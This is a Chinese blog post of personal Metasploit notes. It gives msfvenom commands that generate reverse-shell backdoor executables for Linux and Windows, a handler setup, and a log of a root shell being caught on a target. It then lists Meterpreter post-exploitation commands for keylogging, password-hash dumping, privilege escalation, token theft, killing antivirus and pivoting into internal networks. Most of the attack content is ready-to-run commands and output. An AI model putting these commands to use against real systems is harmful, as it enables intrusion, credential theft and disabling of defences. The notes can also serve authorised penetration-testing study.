MSF工具使用笔记

August 16, 2020 WEB渗透测试 访问: 66 次

小技巧

exploit -j -z#-j(计划任务下进行攻击,后台) -z(攻击完成不遇会话交互)
sessions -l # (查看会话)
sessions -i 2  # 选择会话
sessions -k 2  # 结束会话
ctrl+z #back 会话

生成linux后门可执行程序

1、利用MsfVenom生成linux后门文件

MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message


msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=10001 -f elf > shell.elf

2、在攻击机器上进行端口监听

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x64/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 192.168.1.106
LHOST => 192.168.1.106
msf5 exploit(multi/handler) > set LPORT 10001
LPORT => 10001
msf5 exploit(multi/handler) > exploit

3、在靶机上运行生成的可执行程序
4、攻击机上接收到shell

msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.106:10001 
[*] Sending stage (38 bytes) to 192.168.1.107
[*] Command shell session 1 opened (192.168.1.106:10001 -> 192.168.1.107:39950) at 2020-08-16 14:08:19 +0800
ls
shell.elf
whoami
root

生成windows后门可执行程序

生成木马文件:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.211 LPORT=10001 -f exe > shell.exe

在msf里进行监听,还是利用exploit(multi/handler)模块

启动时报错

root@Kali:~# msfconsole 
[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: could not connect to server: Connection refused
        Is the server running on host "localhost" (::1) and accepting
        TCP/IP connections on port 5432?
could not connect to server: Connection refused
        Is the server running on host "localhost" (127.0.0.1) and accepting
        TCP/IP connections on port 5432?

解决办法:

service postgresql start

初始化Metasploit数据库:msfdb init

Meterpreter后攻击

set payload windows/x64/meterpreter_reverse_tcp
msf5 > msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.43.211 LPORT=10001 -f exe > shell.exe

一些命令

meterpreter > background  放回后台
meterpreter > exit  关闭会话
meterpreter > help  帮助信息
meterpreter > Sysinfo系统平台信息
meterpreter > screenshot  屏幕截取
meterpreter > shell  命令行shell (exit退出)
meterpreter > getlwd  查看本地目录
meterpreter > lcd  切换本地目录
meterpreter > getwd  查看目录
meterpreter > ls 查看文件目录列表
meterpreter > cd  切换目录 
meterpreter > rm  删除文件 
meterpreter > download C:\\Users\\123\\Desktop\\1.txt 1.txt 下载文件
meterpreter > upload /var/www/wce.exe wce.exe  上传文件
meterpreter > search -d c:  -f *.doc  搜索文件
meterpreter > execute -f  cmd.exe -i   执行程序/命令 
meterpreter > ps  查看进程
meterpreter > run post/windows/capture/keylog_recorder   键盘记录
meterpreter > getuid  查看当前用户权限
meterpreter > use priv  加载特权模块
meterpreter > getsystem  提升到SYSTEM权限
meterpreter > hashdump  导出密码散列
meterpreter > ps   查看高权限用户PID
meterpreter > steal_token <PID>  窃取令牌
meterpreter > rev2self  恢复原来的令牌 
meterpreter > migrate pid  迁移进程
meterpreter > run killav  关闭杀毒软件 
meterpreter > run getgui-e  启用远程桌面
meterpreter > portfwd add -l 1234 -p 3389 -r <目标IP>  端口转发
meterpreter > run get_local_subnets  获取内网网段信息
meterpreter > run autoroute -s <内网网段>  创建自动路由
meterpreter > run autoroute -p  查看自动路由表
创建代理通道:
msf > use auxiliary/server/socks4a   设置socks4代理模块
msf auxiliary(socks4a) > show options 
msf auxiliary(socks4a) > run
配置proxychains参数:
nano /etc/proxychains.conf   修改代理监听端口,和前面端口一致
quite_mode  设置成安静模式:去掉如下参数前面的注释

添加新评论